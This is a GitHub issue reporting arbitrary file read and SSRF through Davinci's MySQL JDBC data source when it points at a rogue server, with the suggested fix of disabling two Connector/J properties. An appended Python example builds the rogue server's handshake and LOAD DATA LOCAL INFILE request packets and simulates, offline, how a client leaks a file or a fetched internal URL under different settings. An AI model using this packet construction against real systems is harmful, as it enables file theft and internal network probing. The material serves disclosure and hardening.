edp963 / davinci

Davinci is a DVsaaS (Data Visualization as a Service) Platform
https://edp963.github.io/davinci
Apache License 2.0

DataSource MySQL JDBC connection has two vulnerabilities: arbitrary file read and server-side request forgery (SSRF) #2326

Status: Open. Bertram2000 opened this issue 1 year ago

Bertram2000 commented 1 year ago

Use a malicious MySQL server:

Log in, then set the MySQL JDBC connection to point at the malicious server [screenshot].

Click Test Connection. Two vulnerabilities:

1. Arbitrary file read [screenshot]

Success! [screenshot]

2. Server-side request forgery (SSRF) [screenshot]

Visiting Baidu succeeds [screenshot].

Repair suggestion: set these properties to false: allowLoadLocalInfile, allowUrlInLocalInfile.
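An added example, not part of this issue or of the Davinci code base, that models the exchange the report describes at the wire level: the packets a rogue MySQL server sends (a HandshakeV10 greeting, then a LOAD DATA LOCAL INFILE request in place of an authentication result) and how a simulated JDBC-style client answers under the two Connector/J properties the reporter names. The client model, the file and URL lookup tables, and the path and URL used in `demo()` are constructed for the demo and stand in for the client host's filesystem and internal network; the assumption that both flags are enabled in the affected configuration is the reporter's, not verified here. Nothing below is Connector/J's own code.

```python
import struct

# Constants from the public MySQL client/server protocol (not Davinci code).
CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_LOCAL_FILES = 0x00000080        # server may ask the client to upload a local file
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
LOCAL_INFILE_REQUEST = 0xFB            # first payload byte of a LOAD DATA LOCAL INFILE request


def frame(payload: bytes, seq: int) -> bytes:
    """Wrap a payload in the 4-byte MySQL packet header: 3-byte LE length, 1-byte sequence id."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def parse_frame(data: bytes):
    """Split one framed packet off the front of data -> (seq, payload, remaining bytes)."""
    if len(data) < 4:
        raise ValueError("short packet header")
    length = int.from_bytes(data[:3], "little")
    if len(data) < 4 + length:
        raise ValueError("truncated packet")
    return data[3], data[4:4 + length], data[4 + length:]


def handshake_v10(server_version: bytes = b"5.7.31-rogue", connection_id: int = 1) -> bytes:
    """Greeting a rogue server sends so a JDBC client believes it is talking to MySQL.
    The auth salt is a fixed placeholder; the flag that matters here is CLIENT_LOCAL_FILES."""
    caps = (CLIENT_LONG_PASSWORD | CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41
            | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)
    payload = bytes([0x0A]) + server_version + b"\x00"      # protocol version 10, version string
    payload += struct.pack("<I", connection_id)
    payload += b"A" * 8 + b"\x00"                            # auth-plugin-data part 1, filler
    payload += struct.pack("<H", caps & 0xFFFF)              # capability flags, low 16 bits
    payload += bytes([0x21])                                 # character set utf8_general_ci
    payload += struct.pack("<H", 0x0002)                     # status: SERVER_STATUS_AUTOCOMMIT
    payload += struct.pack("<H", caps >> 16)                 # capability flags, high 16 bits
    payload += bytes([21])                                   # length of auth-plugin-data
    payload += b"\x00" * 10                                  # reserved
    payload += b"B" * 12 + b"\x00"                           # auth-plugin-data part 2
    payload += b"mysql_native_password\x00"
    return frame(payload, 0)


def local_infile_request(name: str, seq: int = 2) -> bytes:
    """What the rogue server sends after the client's handshake response: 0xFB followed by the
    path (or, if the client permits URLs, the URL) it wants the client to read and upload."""
    return frame(bytes([LOCAL_INFILE_REQUEST]) + name.encode(), seq)


def client_reply(server_packet: bytes, *, allow_load_local_infile: bool,
                 allow_url_in_local_infile: bool, read_file, fetch_url) -> bytes:
    """Model of a JDBC-style client receiving a packet after sending its handshake response.

    read_file(path) and fetch_url(url) are supplied by the caller so the demo runs offline.
    The two flags mirror the Connector/J properties named in the report. Returns the bytes the
    client sends back, or b"" when it refuses the request outright.
    """
    seq, payload, _ = parse_frame(server_packet)
    if not payload or payload[0] != LOCAL_INFILE_REQUEST:
        return b""                      # not a LOCAL INFILE request; nothing to upload
    if not allow_load_local_infile:
        return b""                      # hardened: the client never uploads local data
    name = payload[1:].decode()
    try:
        if allow_url_in_local_infile and "://" in name:
            data = fetch_url(name)      # SSRF: the client fetches a URL chosen by the server
        else:
            data = read_file(name)      # arbitrary file read: path chosen by the server
    except OSError:
        return frame(b"", seq + 1)      # unreadable source: client reports an empty file
    # The client streams the content, then an empty packet marks end of file.
    return frame(data, seq + 1) + frame(b"", seq + 2)


def lookup(table):
    """Build a reader over a constructed table that fails like a missing file would."""
    def reader(key):
        if key not in table:
            raise FileNotFoundError(key)
        return table[key]
    return reader


def demo():
    """Run the rogue server's request against three client configurations and return what
    leaked for a file path and for a URL (b"" means nothing was uploaded)."""
    read_file = lookup({"/etc/hostname": b"davinci-app\n"})           # constructed filesystem
    fetch_url = lookup({"http://127.0.0.1:8080/env": b"internal=1"})  # constructed internal HTTP
    configs = {
        "both true (as reported)": dict(allow_load_local_infile=True, allow_url_in_local_infile=True),
        "allowUrlInLocalInfile=false": dict(allow_load_local_infile=True, allow_url_in_local_infile=False),
        "both false (repair suggestion)": dict(allow_load_local_infile=False, allow_url_in_local_infile=False),
    }
    leaked = lambda reply: parse_frame(reply)[1] if reply else b""
    return {
        label: (leaked(client_reply(local_infile_request("/etc/hostname"),
                                    read_file=read_file, fetch_url=fetch_url, **flags)),
                leaked(client_reply(local_infile_request("http://127.0.0.1:8080/env"),
                                    read_file=read_file, fetch_url=fetch_url, **flags)))
        for label, flags in configs.items()
    }
```

With Connector/J the two properties are ordinarily passed in the JDBC URL (`jdbc:mysql://host/db?allowLoadLocalInfile=false&allowUrlInLocalInfile=false`). Because Davinci accepts the connection string from the user, the safe fix is for the server to force these values when it builds the connection rather than trust whatever the submitted URL carries; the middle configuration in `demo()` shows that disabling only the URL option stops the SSRF but still leaves the file read.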